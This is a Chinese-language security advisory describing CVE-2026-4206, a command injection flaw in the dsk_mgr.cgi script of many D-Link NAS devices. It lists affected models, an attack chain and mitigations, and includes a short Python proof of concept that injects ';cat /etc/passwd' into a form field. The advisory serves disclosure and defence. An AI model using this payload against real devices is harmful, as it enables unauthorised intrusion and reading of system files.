IPBUF安全漏洞报告
English
CVE-2026-4206 CVSS 6.3 中危

CVE-2026-4206 D-Link多款NAS设备命令注入漏洞

披露日期: 2026-03-16
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4206
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04

相关标签

命令注入CVE-2026-4206D-LinkNAS远程代码执行Web漏洞CGI

漏洞概述

该漏洞影响D-Link多款NAS设备,攻击者可通过构造恶意请求在受影响的设备上执行任意命令。漏洞存在于Web管理界面的特定CGI脚本中,由于缺乏有效的输入验证,攻击者能够在已认证的情况下注入并执行系统命令。

技术细节

漏洞源于/cgi-bin/dsk_mgr.cgi中的多个函数(FMT_rebuild_diskmgr、FMT_create_diskmgr、ScanDisk_run_e2fsck)未对用户输入进行充分验证,攻击者可利用分号或管道等命令分隔符注入额外命令。由于攻击需要低权限认证,攻击者首先需要获取有效凭证才能利用此漏洞。

攻击链分析

STEP 1
1
攻击者识别运行存在漏洞固件版本的D-Link NAS设备
STEP 2
2
通过默认或窃取的凭证获取设备访问权限
STEP 3
3
构造包含恶意命令的HTTP请求至/cgi-bin/dsk_mgr.cgi
STEP 4
4
利用命令分隔符注入任意系统命令
STEP 5
5
在设备上以提升的权限执行任意代码

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target = 'http://target-ip/cgi-bin/dsk_mgr.cgi' payload = {'func': 'FMT_rebuild_diskmgr', 'disk': ';cat /etc/passwd'} response = requests.post(target, data=payload, auth=('user', 'pass')) print(response.text)

影响范围

DNS-120 < 20260205
DNR-202L < 20260205
DNS-315L < 20260205
DNS-320 < 20260205
DNS-320L < 20260205
DNS-320LW < 20260205
DNS-321 < 20260205
DNR-322L < 20260205
DNS-323 < 20260205
DNS-325 < 20260205
DNS-326 < 20260205
DNS-327L < 20260205
DNR-326 < 20260205
DNS-340L < 20260205
DNS-343 < 20260205
DNS-345 < 20260205
DNS-726-4 < 20260205
DNS-1100-4 < 20260205
DNS-1200-05 < 20260205
DNS-1550-04 < 20260205

防御指南

临时缓解措施
限制对/cgi-bin/dsk_mgr.cgi的访问,仅允许受信任的管理IP访问;使用防火墙规则阻止外部对管理端口的直接访问;监控日志中的异常命令注入尝试模式。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表